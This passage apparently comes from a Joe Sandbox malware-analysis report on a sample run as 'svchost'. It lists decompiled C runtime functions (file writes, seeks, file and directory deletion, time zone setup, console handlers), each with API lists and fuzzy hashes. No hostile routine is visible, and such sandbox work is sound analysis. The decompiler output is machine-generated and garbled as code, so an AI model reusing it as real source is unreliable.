                            				signed int _v32;
                            				intOrPtr _v36;
                            				signed int _v40;
                            				signed int _v44;
                            				intOrPtr _v48;
                            				void* _v52;
                            				void* __ebx;
                            				signed int _t62;
                            				intOrPtr _t66;
                            				signed char _t68;
                            				signed int _t69;
                            				signed int _t71;
                            				signed int _t73;
                            				signed int _t74;
                            				signed int _t75;
                            				signed int _t76;
                            				intOrPtr _t78;
                            				signed int _t80;
                            				signed int _t84;
                            				signed int _t87;
                            				signed int _t101;
                            				signed int _t102;
                            				signed int _t105;
                            				intOrPtr _t107;
                            				signed int _t112;
                            				signed int _t114;
                            				void* _t116;
                            				signed int _t120;
                            				signed int _t123;
                            				signed int _t125;
                            				void* _t126;
                            
                            				_t62 =  *0xbec008; // 0xdc55bb75
                            				_v8 = _t62 ^ _t125;
                            				_t105 = _a12;
                            				_v12 = _t105;
                            				_t120 = _a4;
                            				_t116 = _a8;
                            				_v52 = _t116;
                            				if(_t105 != 0) {
                            					__eflags = _t116;
                            					if(_t116 != 0) {
                            						_t101 = _t120 >> 6;
                            						_t114 = (_t120 & 0x0000003f) * 0x30;
                            						_v32 = _t101;
                            						_t66 =  *((intOrPtr*)(0xbf6108 + _t101 * 4));
                            						_v48 = _t66;
                            						_v28 = _t114;
                            						_t102 =  *((intOrPtr*)(_t66 + _t114 + 0x29));
                            						__eflags = _t102 - 2;
                            						if(_t102 == 2) {
                            							L6:
                            							_t68 =  !_t105;
                            							__eflags = _t68 & 0x00000001;
                            							if((_t68 & 0x00000001) != 0) {
                            								_t66 = _v48;
                            								L9:
                            								__eflags =  *(_t66 + _t114 + 0x28) & 0x00000020;
                            								if(__eflags != 0) {
                            									E00BD2807(_t120, 0, 0, 2);
                            									_t126 = _t126 + 0x10;
                            								}
                            								_t69 = E00BD2C30(_t102, _t114, __eflags, _t120);
                            								__eflags = _t69;
                            								if(_t69 == 0) {
                            									_t107 =  *((intOrPtr*)(0xbf6108 + _v32 * 4));
                            									_t71 = _v28;
                            									__eflags =  *(_t107 + _t71 + 0x28) & 0x00000080;
                            									if(( *(_t107 + _t71 + 0x28) & 0x00000080) == 0) {
                            										_v24 = 0;
                            										_v20 = 0;
                            										_v16 = 0;
                            										_t73 = WriteFile( *(_t107 + _t71 + 0x18), _t116, _v12,  &_v20, 0); // executed
                            										__eflags = _t73;
                            										if(_t73 == 0) {
                            											_v24 = GetLastError();
                            										}
                            										goto L28;
                            									}
                            									_t84 = _t102;
                            									__eflags = _t84;
                            									if(_t84 == 0) {
                            										E00BD2CA6( &_v24, _t120, _t116, _v12);
                            										goto L17;
                            									}
                            									_t87 = _t84 - 1;
                            									__eflags = _t87;
                            									if(_t87 == 0) {
                            										_t86 = E00BD2E73( &_v24, _t120, _t116, _v12);
                            										goto L17;
                            									}
                            									__eflags = _t87 != 1;
                            									if(_t87 != 1) {
                            										goto L34;
                            									}
                            									_t86 = E00BD2D85( &_v24, _t120, _t116, _v12);
                            									goto L17;
                            								} else {
                            									__eflags = _t102;
                            									if(_t102 == 0) {
                            										_t86 = E00BD2A10( &_v24, _t120, _t116, _v12);
                            										L17:
                            										L15:
                            										L28:
                            										asm("movsd");
                            										asm("movsd");
                            										asm("movsd");
                            										_t74 = _v40;
                            										__eflags = _t74;
                            										if(_t74 != 0) {
                            											_t75 = _t74 - _v36;
                            											__eflags = _t75;
                            											L40:
                            											L41:
                            											E00BC786A();
                            											return _t75;
                            										}
                            										_t76 = _v44;
                            										__eflags = _t76;
                            										if(_t76 == 0) {
                            											_t116 = _v52;
                            											L34:
                            											_t112 = _v28;
                            											_t78 =  *((intOrPtr*)(0xbf6108 + _v32 * 4));
                            											__eflags =  *(_t78 + _t112 + 0x28) & 0x00000040;
                            											if(( *(_t78 + _t112 + 0x28) & 0x00000040) == 0) {
                            												L37:
                            												 *((intOrPtr*)(E00BCC9CE())) = 0x1c;
                            												_t80 = E00BCC9BB();
                            												 *_t80 =  *_t80 & 0x00000000;
                            												__eflags =  *_t80;
                            												L38:
                            												_t75 = _t80 | 0xffffffff;
                            												goto L40;
                            											}
                            											__eflags =  *_t116 - 0x1a;
                            											if( *_t116 != 0x1a) {
                            												goto L37;
                            											}
                            											_t75 = 0;
                            											goto L40;
                            										}
                            										_t123 = 5;
                            										__eflags = _t76 - _t123;
                            										if(_t76 != _t123) {
                            											_t80 = E00BCC998(_t76);
                            										} else {
                            											 *((intOrPtr*)(E00BCC9CE())) = 9;
                            											_t80 = E00BCC9BB();
                            											 *_t80 = _t123;
                            										}
                            										goto L38;
                            									}
                            									__eflags = _t102 - 1 - 1;
                            									if(_t102 - 1 > 1) {
                            										goto L34;
                            									}
                            									E00BD2BC3( &_v24, _t116, _v12);
                            									goto L15;
                            								}
                            							}
                            							 *(E00BCC9BB()) =  *_t94 & 0x00000000;
                            							 *((intOrPtr*)(E00BCC9CE())) = 0x16;
                            							_t80 = E00BD1788();
                            							goto L38;
                            						}
                            						__eflags = _t102 - 1;
                            						if(_t102 != 1) {
                            							goto L9;
                            						}
                            						goto L6;
                            					}
                            					 *(E00BCC9BB()) =  *_t96 & _t116;
                            					 *((intOrPtr*)(E00BCC9CE())) = 0x16;
                            					_t75 = E00BD1788() | 0xffffffff;
                            					goto L41;
                            				}
                            				_t75 = 0;
                            				goto L41;
                            			}

                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6b1f2f3c042dd4bc54a6ee99b67fa71162f66033f6cf343ff36baad638a9c8f6
                            • Instruction ID: 645d977ccdc2b0dbfaff8ab29338dc3d6e6ad25602876663470d1752d9dde34e
                            • Opcode Fuzzy Hash: 6b1f2f3c042dd4bc54a6ee99b67fa71162f66033f6cf343ff36baad638a9c8f6
                            • Instruction Fuzzy Hash: B9518171D0420AAACF159FA9CC45FAEFBF4EF15B10F14019AE405B7393EA709A41CB62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 74%
                            			E00BDB2EE(void* __edx, void* __eflags) {
                            				signed int _v8;
                            				char _v264;
                            				char _v268;
                            				char _v272;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				signed int _t10;
                            				void* _t14;
                            				void* _t17;
                            				signed int _t21;
                            				void* _t27;
                            				signed int _t36;
                            				void* _t38;
                            				signed int _t42;
                            				signed int _t44;
                            				signed int _t45;
                            
                            				_t10 =  *0xbec008; // 0xdc55bb75
                            				_v8 = _t10 ^ _t45;
                            				 *0xbec91c =  *0xbec91c | 0xffffffff;
                            				 *0xbec910 =  *0xbec910 | 0xffffffff;
                            				_push(_t38);
                            				_t25 = "TZ";
                            				_t36 = 0;
                            				 *0xbf6578 = 0;
                            				_t14 = E00BD6CC0("TZ", __edx, 0, _t38, __eflags,  &_v268,  &_v264, 0x100, "TZ");
                            				if(_t14 != 0) {
                            					__eflags = _t14 - 0x22;
                            					if(__eflags == 0) {
                            						_t44 = E00BD0A25(_t27, _v268);
                            						__eflags = _t44;
                            						if(__eflags != 0) {
                            							_t21 = E00BD6CC0(_t25, __edx, 0, _t44, __eflags,  &_v272, _t44, _v268, _t25);
                            							__eflags = _t21;
                            							if(_t21 == 0) {
                            								E00BD09EB(0);
                            								_t36 = _t44;
                            							} else {
                            								_push(_t44);
                            								goto L5;
                            							}
                            						} else {
                            							_push(0);
                            							L5:
                            							E00BD09EB();
                            						}
                            					}
                            				} else {
                            					_t36 =  &_v264;
                            				}
                            				asm("sbb esi, esi");
                            				_t42 =  ~(_t36 -  &_v264) & _t36;
                            				if(_t36 == 0) {
                            					L13:
                            					E00BDB193(__eflags); // executed
                            				} else {
                            					_t52 =  *_t36;
                            					if( *_t36 == 0) {
                            						goto L13;
                            					} else {
                            						_push(_t36);
                            						E00BDAFBE(_t52);
                            					}
                            				}
                            				_t17 = E00BD09EB(_t42);
                            				E00BC786A();
                            				return _t17;
                            			}

                            APIs
                            • _free.LIBCMT ref: 00BDB361
                            • _free.LIBCMT ref: 00BDB3B7
                              • Part of subcall function 00BDB193: _free.LIBCMT ref: 00BDB1EB
                              • Part of subcall function 00BDB193: GetTimeZoneInformation.KERNELBASE(?,00000000,00000000,00000000,?,00BE9410), ref: 00BDB1FD
                              • Part of subcall function 00BDB193: WideCharToMultiByte.KERNEL32(00000000,00000000,Pacific Standard Time,000000FF,00000000,0000003F,00000000,?,?), ref: 00BDB275
                              • Part of subcall function 00BDB193: WideCharToMultiByte.KERNEL32(00000000,00000000,Pacific Daylight Time,000000FF,?,0000003F,00000000,?), ref: 00BDB2A2
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: _free$ByteCharMultiWide$InformationTimeZone
                            • String ID:
                            • API String ID: 314583886-0
                            • Opcode ID: 475fcbf16e82d4c56ff4032e5634204508d2a31199865ebadcd78f6ef496a36b
                            • Instruction ID: f73aa9235887102a54a9830897f76a1018698745e2d2808f339524419713c613
                            • Opcode Fuzzy Hash: 475fcbf16e82d4c56ff4032e5634204508d2a31199865ebadcd78f6ef496a36b
                            • Instruction Fuzzy Hash: 89212976800218D6DB35A6259C82EEAF7F8DB51370F1202D7E894A3381FF704E85D695
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00BD18F4(void* __eflags, signed int _a4) {
                            				intOrPtr _t13;
                            				int _t15;
                            				void* _t21;
                            				signed int _t33;
                            				long _t35;
                            
                            				_t33 = _a4;
                            				if(E00BCE926(_t33) != 0xffffffff) {
                            					_t13 =  *0xbf6108; // 0xe0a500
                            					if(_t33 != 1 || ( *(_t13 + 0x88) & 0x00000001) == 0) {
                            						if(_t33 != 2 || ( *(_t13 + 0x58) & 0x00000001) == 0) {
                            							goto L7;
                            						} else {
                            							goto L6;
                            						}
                            					} else {
                            						L6:
                            						_t21 = E00BCE926(2);
                            						if(E00BCE926(1) == _t21) {
                            							goto L1;
                            						}
                            						L7:
                            						_t15 = FindCloseChangeNotification(E00BCE926(_t33)); // executed
                            						if(_t15 != 0) {
                            							goto L1;
                            						}
                            						_t35 = GetLastError();
                            						L9:
                            						E00BCE895(_t33);
                            						 *((char*)( *((intOrPtr*)(0xbf6108 + (_t33 >> 6) * 4)) + 0x28 + (_t33 & 0x0000003f) * 0x30)) = 0;
                            						if(_t35 == 0) {
                            							return 0;
                            						}
                            						return E00BCC998(_t35) | 0xffffffff;
                            					}
                            				}
                            				L1:
                            				_t35 = 0;
                            				goto L9;
                            			}

                            APIs
                            • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,00BD1812,?), ref: 00BD194A
                            • GetLastError.KERNEL32(?,00BD1812,?), ref: 00BD1954
                            • __dosmaperr.LIBCMT ref: 00BD197F
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                            • String ID:
                            • API String ID: 490808831-0
                            • Opcode ID: 5a1a84e88ebd24ffd9d85538f602de16fd2cf5c76908a7882cb156b8d7f42b8c
                            • Instruction ID: bcb90055afd35b8a1550d97581d9db2b4f95aab8b160c37cc0d63313617daa17
                            • Opcode Fuzzy Hash: 5a1a84e88ebd24ffd9d85538f602de16fd2cf5c76908a7882cb156b8d7f42b8c
                            • Instruction Fuzzy Hash: F2010832A0421476DA75237CA875B7DA7C9CB81775F2505DEE8299B3C3EEB8DC838190
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 86%
                            			E00BD276E(void* __ecx, void* __eflags, signed int _a4, union _LARGE_INTEGER _a8, union _LARGE_INTEGER* _a12, intOrPtr _a16) {
                            				signed int _v8;
                            				void* _v12;
                            				void* _t15;
                            				int _t16;
                            				signed int _t19;
                            				signed int _t32;
                            				signed int _t33;
                            				signed int _t36;
                            
                            				_t36 = _a4;
                            				_push(_t32);
                            				_t15 = E00BCE926(_t36);
                            				_t33 = _t32 | 0xffffffff;
                            				if(_t15 != _t33) {
                            					_push(_a16);
                            					_t16 = SetFilePointerEx(_t15, _a8, _a12,  &_v12); // executed
                            					if(_t16 != 0) {
                            						if((_v12 & _v8) == _t33) {
                            							goto L2;
                            						} else {
                            							_t19 = _v12;
                            							_t39 = (_t36 & 0x0000003f) * 0x30;
                            							 *( *((intOrPtr*)(0xbf6108 + (_t36 >> 6) * 4)) + _t39 + 0x28) =  *( *((intOrPtr*)(0xbf6108 + (_t36 >> 6) * 4)) + 0x28 + (_t36 & 0x0000003f) * 0x30) & 0x000000fd;
                            						}
                            					} else {
                            						E00BCC998(GetLastError());
                            						goto L2;
                            					}
                            				} else {
                            					 *((intOrPtr*)(E00BCC9CE())) = 9;
                            					L2:
                            					_t19 = _t33;
                            				}
                            				return _t19;
                            			}

                            APIs
                            • SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,?,00000000,?,00000000,?,?,?,00BD281D,?,00000000,00000002,00000000), ref: 00BD27A7
                            • GetLastError.KERNEL32(?,00BD281D,?,00000000,00000002,00000000,?,00BD3143,00000000,00000000,00000000,00000002,00000000,?,00000000), ref: 00BD27B1
                            • __dosmaperr.LIBCMT ref: 00BD27B8
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ErrorFileLastPointer__dosmaperr
                            • String ID:
                            • API String ID: 2336955059-0
                            • Opcode ID: d74e7f7bd27a0a5f0a2e088d0f7fae0308ba25fd7660655a9f0aee226c63ec2d
                            • Instruction ID: 7820ddce9f5f1defbc10987eae1e93d047a4f985c6bb35140995f0b629dcaaaa
                            • Opcode Fuzzy Hash: d74e7f7bd27a0a5f0a2e088d0f7fae0308ba25fd7660655a9f0aee226c63ec2d
                            • Instruction Fuzzy Hash: FD019033614144ABCF219F58DC41DAD7B69EB81330B240289F8149B391FAB0DD408790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00BCE238(WCHAR* _a4) {
                            				int _t2;
                            
                            				_t2 = RemoveDirectoryW(_a4); // executed
                            				if(_t2 != 0) {
                            					return 0;
                            				} else {
                            					return E00BCC998(GetLastError()) | 0xffffffff;
                            				}
                            			}





                            APIs
                            • RemoveDirectoryW.KERNELBASE(00BC4374,?,00BC4374,?), ref: 00BCE240
                            • GetLastError.KERNEL32(?,00BC4374,?), ref: 00BCE24A
                            • __dosmaperr.LIBCMT ref: 00BCE251
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: DirectoryErrorLastRemove__dosmaperr
                            • String ID:
                            • API String ID: 4061612599-0
                            • Opcode ID: 16b236dd2121b1d2af592046a8ff0183f544c07b13a8c60f77ff51d1027ef240
                            • Instruction ID: cde5b174ab2b04e0aab62dbfe938e5b7c98f3fbe45f9216ca1960af5ff1e2683
                            • Opcode Fuzzy Hash: 16b236dd2121b1d2af592046a8ff0183f544c07b13a8c60f77ff51d1027ef240
                            • Instruction Fuzzy Hash: EDD0123215524CA78F403BF6BC09F163F9DDA813747100659F43CCA5A1EE71C890A654
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00BCEF70(WCHAR* _a4) {
                            				int _t2;
                            
                            				_t2 = DeleteFileW(_a4); // executed
                            				if(_t2 != 0) {
                            					return 0;
                            				} else {
                            					return E00BCC998(GetLastError()) | 0xffffffff;
                            				}
                            			}





                            APIs
                            • DeleteFileW.KERNELBASE(?,?,00BC46DC,?,?,?), ref: 00BCEF78
                            • GetLastError.KERNEL32(?,?), ref: 00BCEF82
                            • __dosmaperr.LIBCMT ref: 00BCEF89
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: DeleteErrorFileLast__dosmaperr
                            • String ID:
                            • API String ID: 1545401867-0
                            • Opcode ID: 7c94832780852409f18576841389d357e0f63060f1452103fe6d2a82d939ec8d
                            • Instruction ID: 2958a7887ced5ec585dbff1f4f1e1e59968a763095b42011f034e1540b74eda9
                            • Opcode Fuzzy Hash: 7c94832780852409f18576841389d357e0f63060f1452103fe6d2a82d939ec8d
                            • Instruction Fuzzy Hash: 1CD0123215424C6BDB107BF5BC49A1A3F9DDE907747100659F43CCA4A1DE71C8908652
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 87%
                            			E00BCEDBE(signed int** __edx, void* __eflags) {
                            				signed int* _t26;
                            				int _t31;
                            				intOrPtr* _t32;
                            				void* _t36;
                            				intOrPtr _t38;
                            				signed int* _t40;
                            				int _t41;
                            				void* _t42;
                            				intOrPtr _t55;
                            				signed int _t57;
                            				intOrPtr* _t59;
                            				void* _t61;
                            				void* _t62;
                            
                            				_t54 = __edx;
                            				E00BC8310(__edx, 0xbea620, 0x18);
                            				_t40 =  *(_t62 + 0xc);
                            				if(_t40 == 4 || _t40 == 3) {
                            					_push( *((intOrPtr*)(_t62 + 8)));
                            					goto L34;
                            				} else {
                            					_t55 =  *((intOrPtr*)(_t62 + 8));
                            					if(_t55 == 2 || _t55 == 0x15 || _t55 == 0x16 || _t55 == 6 || _t55 == 0xf) {
                            						_t41 = 0;
                            						 *((char*)(_t62 - 0x19)) = 0;
                            						 *(_t62 - 0x28) = 0;
                            						 *(_t62 - 0x20) = 0;
                            						E00BD5FFE(3);
                            						 *((intOrPtr*)(_t62 - 4)) = 0;
                            						if(_t55 == 2 || _t55 == 0x15) {
                            							if( *0xbf5e90 == 0) {
                            								_t31 = SetConsoleCtrlHandler(E00BCEA12, 1); // executed
                            								if(_t31 == 0) {
                            									_t32 = E00BCC9BB();
                            									 *_t32 = GetLastError();
                            									_t41 = 1;
                            									 *((char*)(_t62 - 0x19)) = 1;
                            								} else {
                            									 *0xbf5e90 = 1;
                            								}
                            							}
                            						}
                            						_t26 = E00BCEAC0(_t55);
                            						 *(_t62 - 0x28) = _t26;
                            						if(_t26 != 0) {
                            							_t57 =  *0xbec008; // 0xdc55bb75
                            							asm("ror esi, cl");
                            							 *(_t62 - 0x20) = _t57 ^  *_t26;
                            							_t29 =  *(_t62 + 0xc);
                            							if( *(_t62 + 0xc) != 2) {
                            								 *( *(_t62 - 0x28)) = E00BCF6AC(_t29);
                            							}
                            						}
                            						 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                            						E00BCEF58();
                            						if(_t41 != 0) {
                            							goto L10;
                            						} else {
                            							goto L35;
                            						}
                            					} else {
                            						if(_t55 == 8 || _t55 == 4 || _t55 == 0xb) {
                            							_t59 = E00BD44A9(_t42);
                            							if(_t59 == 0) {
                            								goto L10;
                            							}
                            							if( *_t59 != 0xbe5190) {
                            								L15:
                            								 *((intOrPtr*)(_t62 - 0x24)) =  *_t59;
                            								_t36 = E00BCEB02(_t55,  *_t59);
                            								if(_t36 == 0) {
                            									goto L10;
                            								}
                            								_t4 = _t36 + 8; // 0x8
                            								_t54 = _t4;
                            								 *(_t62 - 0x28) =  *_t54;
                            								if(_t40 == 2) {
                            									L21:
                            									goto L35;
                            								}
                            								_t61 =  *0xbe5220 * 0xc +  *((intOrPtr*)(_t62 - 0x24));
                            								if(_t36 == _t61) {
                            									goto L21;
                            								}
                            								while( *((intOrPtr*)(_t54 - 4)) == _t55) {
                            									 *_t54 = _t40;
                            									_t54 =  &(_t54[3]);
                            									_t8 = _t54 - 8; // -12
                            									if(_t8 != _t61) {
                            										continue;
                            									}
                            									break;
                            								}
                            								goto L21;
                            							}
                            							_t38 = E00BD0A25(_t42,  *0xbe5224);
                            							 *_t59 = _t38;
                            							if(_t38 == 0) {
                            								goto L10;
                            							} else {
                            								E00BC89A0(_t38, 0xbe5190,  *0xbe5224);
                            								goto L15;
                            							}
                            						} else {
                            							L10:
                            							_push(_t55);
                            							L34:
                            							E00BCEB2A();
                            							L35:
                            							return E00BC8356(_t54);
                            						}
                            					}
                            				}
                            			}

















                            APIs
                            • SetConsoleCtrlHandler.KERNELBASE(00BCEA12,00000001,00BEA620,00000018,00BC4440,00000016,00000001,?,?,00001000,00BC26B4,?,00000000), ref: 00BCEED7
                            • GetLastError.KERNEL32 ref: 00BCEEF1
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ConsoleCtrlErrorHandlerLast
                            • String ID:
                            • API String ID: 3113525192-0
                            • Opcode ID: bd80bf5b3ff642ee176c3374ab91e814799070ce6a900a5d24022b86d836887b
                            • Instruction ID: a09d45cf2bd91269e0b5677a7397cb3c76fdb37911abc0431a753e22a7ed8e7e
                            • Opcode Fuzzy Hash: bd80bf5b3ff642ee176c3374ab91e814799070ce6a900a5d24022b86d836887b
                            • Instruction Fuzzy Hash: 1341DE72A00646CBEF759F68C885FAD7BE2EB59350B1800DDF425AB261DB31DC80C751
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 62%
                            			E00BCCA68(WCHAR* _a4, void* _a8) {
                            				void* _v8;
                            				void _v56;
                            				void* __edi;
                            				signed int _t17;
                            				void* _t18;
                            				signed int _t19;
                            				signed int _t20;
                            				intOrPtr* _t25;
                            				signed int _t26;
                            				signed int _t34;
                            				signed int _t36;
                            				void* _t39;
                            				signed int _t42;
                            				signed int _t44;
                            				void* _t45;
                            				WCHAR* _t49;
                            				void* _t56;
                            				intOrPtr _t59;
                            				void* _t60;
                            				void* _t62;
                            
                            				if(_a8 != 0) {
                            					_push(_t45);
                            					_t34 = 0;
                            					E00BC8520(_t45,  &_v56, 0, 0x30);
                            					_t36 = 0xc;
                            					memcpy(_a8,  &_v56, _t36 << 2);
                            					_t62 = _t60 + 0x18;
                            					_t49 = _a4;
                            					__eflags = _t49;
                            					if(_t49 != 0) {
                            						_t17 = E00BD5190(_t49, L"?*");
                            						_pop(_t39);
                            						__eflags = _t17;
                            						if(_t17 == 0) {
                            							_t18 = CreateFileW(_t49, 0x80, 7, 0, 3, 0x2000000, 0); // executed
                            							_push(_a8);
                            							_t56 = _t18;
                            							_v8 = _t56;
                            							__eflags = _t56 - 0xffffffff;
                            							if(__eflags == 0) {
                            								_push(_t49);
                            								_t19 = E00BCCB6F(_t39, _t44, _t49, __eflags);
                            							} else {
                            								_push(_t56);
                            								_push(0xffffffff);
                            								_push(_t49);
                            								_t19 = E00BCCBFB(_t44);
                            								_t62 = _t62 + 0x10;
                            							}
                            							__eflags = _t19;
                            							if(_t19 == 0) {
                            								E00BC8520(_t49,  &_v56, _t34, 0x30);
                            								_t34 = _t34 | 0xffffffff;
                            								__eflags = _t34;
                            								_t42 = 0xc;
                            								memcpy(_a8,  &_v56, _t42 << 2);
                            								_t56 = _v8;
                            							}
                            							__eflags = _t56 - 0xffffffff;
                            							if(_t56 != 0xffffffff) {
                            								CloseHandle(_t56);
                            							}
                            							_t20 = _t34;
                            							L15:
                            							return _t20;
                            						}
                            						_t25 = E00BCC9CE();
                            						_t59 = 2;
                            						 *_t25 = _t59;
                            						_t26 = E00BCC9BB();
                            						 *_t26 = _t59;
                            						L6:
                            						_t20 = _t26 | 0xffffffff;
                            						goto L15;
                            					}
                            					 *(E00BCC9BB()) = 0;
                            					 *((intOrPtr*)(E00BCC9CE())) = 0x16;
                            					_t26 = E00BD1788();
                            					goto L6;
                            				}
                            				 *(E00BCC9BB()) =  *_t29 & 0x00000000;
                            				 *((intOrPtr*)(E00BCC9CE())) = 0x16;
                            				return E00BD1788() | 0xffffffff;
                            			}
























                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 773d7f38ceb036a4f5e3af9875c8baa617566c7472c25bffb9b3bccefcadf1b0
                            • Instruction ID: f0de4c3dc31bde5c32b23e09d9b28a932663bd49cee2a7f28384d8d4f4b2e188
                            • Opcode Fuzzy Hash: 773d7f38ceb036a4f5e3af9875c8baa617566c7472c25bffb9b3bccefcadf1b0
                            • Instruction Fuzzy Hash: F731D97190020CBADB217BA49C86FAE3BE8DF12735F200299F9686B1D1DBB05D019665
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 63%
                            			E00BC13D0(void* __edx, intOrPtr* _a4, intOrPtr _a8) {
                            				signed int _v4;
                            				void* _v8;
                            				char _v92;
                            				void* _v100;
                            				char _v104;
                            				signed int _t12;
                            				signed int _t14;
                            				void* _t17;
                            				void* _t21;
                            				intOrPtr* _t31;
                            				char* _t35;
                            				signed int _t42;
                            				void* _t43;
                            
                            				_t42 =  &_v100;
                            				_t12 =  *0xbec008; // 0xdc55bb75
                            				_v4 = _t12 ^ _t42;
                            				_t31 = _a4;
                            				_t35 =  &_v92;
                            				_t21 = _a8 + 0xffffffa0;
                            				_t14 = E00BC9F16(__edx,  *_t31, _t21, 0); // executed
                            				_t43 = _t42 + 0xc;
                            				if(_t14 != 0) {
                            					L5:
                            					E00BC786A();
                            					return _t14 | 0xffffffff;
                            				} else {
                            					_t14 = E00BC9B2B( &_v100, 0x60, 1,  *_t31); // executed
                            					_t43 = _t43 + 0x10;
